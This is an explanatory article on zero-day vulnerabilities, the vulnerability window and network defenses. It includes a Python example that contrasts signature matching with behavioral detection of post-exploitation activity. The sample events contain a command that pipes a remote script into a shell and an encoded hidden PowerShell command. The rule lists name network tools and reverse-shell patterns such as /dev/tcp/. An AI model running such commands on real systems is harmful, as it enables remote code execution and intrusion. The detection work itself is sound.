A zero-day vulnerability is a vulnerability in a system or device that is unknown to the party responsible for fixing it, or has only just been disclosed, so no patch is yet available. The name refers to the number of days the vendor has had to address the flaw: zero. An exploit that attacks a zero-day vulnerability is called a zero-day exploit, and an attack that uses one is a zero-day attack.
Zero-day exploits give attackers a large advantage because most security defenses are built around known exploits, so a targeted attack based on a zero-day exploit can go unnoticed for a long time. The success of a zero-day attack depends on the vulnerability window: the time between the vulnerability's discovery (or first exploitation) and the deployment of a patch on the affected systems. Even a publicly known vulnerability can have a long window if its patch is difficult to develop, or if administrators are slow to apply it. The longer the window, the greater the chance that the attack goes unnoticed, and the more effective it is.
Defending against zero-day attacks
Zero-day exploits are difficult to defend against because they are difficult to detect. Signature-based anti-malware and intrusion detection tools compare suspicious code or traffic with signatures of known malware and known exploits; when malware delivers a zero-day exploit that has never been encountered before, there is no signature to match and such tools fail to block it. Vulnerability scanners have the same blind spot for a different reason: they test for known flaws, and a zero-day is by definition not yet among them.
Since a zero-day vulnerability cannot be known in advance, there is no way to guard against a specific exploit before it is used. However, there are things organizations can do to reduce the likelihood that an exploit succeeds and the damage it can do if it does.
- Use virtual local area networks (VLANs) to segregate parts of the network, or dedicated physical or virtual network segments to isolate sensitive traffic flowing between servers, so that a single compromised host cannot reach everything.
- Implement IPsec, the IP security protocol suite, to apply encryption and authentication to network traffic, so that an attacker who has gained a foothold cannot easily sniff or inject traffic between systems.
- Deploy an IDS or IPS. Signature-based IDS and IPS products may not recognize the exploit itself, but anomaly- and behavior-based detection can alert defenders to suspicious activity that occurs as a side effect of the attack, such as a server process spawning a shell or an unexpected outbound connection.
- Use network access control (NAC) to prevent rogue or unmanaged machines from gaining access to crucial parts of the enterprise environment.
- Lock down wireless access points and use WPA2 (Wi-Fi Protected Access 2) or, where supported, WPA3 with strong credentials for maximum protection against wireless-based attacks.
- Keep all systems patched and up to date. Patches cannot stop an exploit for a flaw nobody knows about, but a fully patched environment removes the known flaws an attacker would otherwise chain with a zero-day and shrinks the attack surface. When a patch for a zero-day does become available, apply it as soon as possible, because the vulnerability window stays open until the patch is deployed.
- Perform regular vulnerability scanning against enterprise networks and remediate any vulnerabilities that are discovered.
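The contrast between signature matching and behavioral detection above is easier to see in code. The following is an added example, not part of the original article or of any product it mentions: it runs a hash-based signature check and a small set of behavioral rules over a constructed sample of process-creation events. The event layout, the process names, the command lines and the hashes are all assumptions made for the illustration; the rules themselves (a web or application server process spawning a shell or a download tool, and well-known suspicious command-line patterns) are the kind of "side effect" detection an IDS or endpoint sensor would use when no signature exists yet.

```python
"""Signature versus behavioral detection of zero-day exploit side effects.

Added example (not the article's own code). The signature check can only
flag payloads it has seen before; the behavioral rules look at what the
exploited process does afterwards, which is the same for a brand-new
exploit and for an old one.
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # image name of the parent process
    child: str     # image name of the newly created process
    cmdline: str   # command line of the new process
    sha256: str    # hash of the child's executable (placeholder values)


# Constructed sample telemetry (assumption). Hashes are made-up placeholders.
EVENTS = [
    ProcEvent("cron", "bash", "bash /opt/backup/nightly.sh", "a1" * 32),
    ProcEvent("httpd", "php-fpm", "php-fpm: pool www", "b2" * 32),
    ProcEvent("httpd", "sh", "sh -c 'curl -s http://203.0.113.5/s.sh | sh'", "c3" * 32),
    ProcEvent("w3wp.exe", "powershell.exe",
              "powershell -nop -w hidden -enc SQBFAFgA", "d4" * 32),
    ProcEvent("systemd", "nginx", "nginx -g 'daemon off;'", "e5" * 32),
]

# A signature feed of known-bad file hashes. Nothing in the sample matches,
# which is exactly the situation with a never-before-seen (zero-day) payload.
KNOWN_BAD_HASHES = {"f6" * 32}

# Behavioral rule tables (assumed, illustrative lists).
SERVER_PARENTS = {"httpd", "nginx", "w3wp.exe", "tomcat", "java"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe", "pwsh"}
DOWNLOADERS = {"curl", "wget", "nc", "ncat", "certutil.exe", "bitsadmin.exe"}
SUSPICIOUS_ARGS = ("-enc ", "-encodedcommand", "/dev/tcp/", "| sh", "| bash", "-e /bin/sh")


def signature_match(events: List[ProcEvent]) -> List[int]:
    """Indices of events whose executable hash is on the known-bad list."""
    return [i for i, e in enumerate(events) if e.sha256 in KNOWN_BAD_HASHES]


def behavioral_match(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Indices and reasons for events that look like post-exploitation activity.

    Each event yields at most one finding; the first matching rule wins.
    """
    findings: List[Tuple[int, str]] = []
    for i, e in enumerate(events):
        parent = e.parent.lower()
        child = e.child.lower()
        cmd = e.cmdline.lower()
        if parent in SERVER_PARENTS and child in SHELLS:
            findings.append((i, f"server process {e.parent} spawned shell {e.child}"))
            continue
        if parent in SERVER_PARENTS and child in DOWNLOADERS:
            findings.append((i, f"server process {e.parent} spawned downloader {e.child}"))
            continue
        if any(tok in cmd for tok in SUSPICIOUS_ARGS):
            findings.append((i, f"suspicious argument pattern in: {e.cmdline}"))
    return findings


if __name__ == "__main__":
    print("signature hits:", signature_match(EVENTS))
    for idx, reason in behavioral_match(EVENTS):
        print(f"behavioral hit on event {idx}: {reason}")
```

Run against the sample, the signature check returns nothing, while the behavioral rules flag the two web-server events (the `httpd` child shell piping a remote script into `sh`, and the `w3wp.exe` child running an encoded PowerShell command) and leave the benign cron job, the PHP worker and the nginx start alone. The rules are deliberately narrow; in production they would be tuned against a baseline of normal parent/child pairs for each host role, and would complement, not replace, signature feeds.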
Maintaining a high standard of information security will not prevent every zero-day exploit, but it limits what a successful exploit can reach, improves the odds of noticing it, and closes the vulnerability window quickly once a patch is released.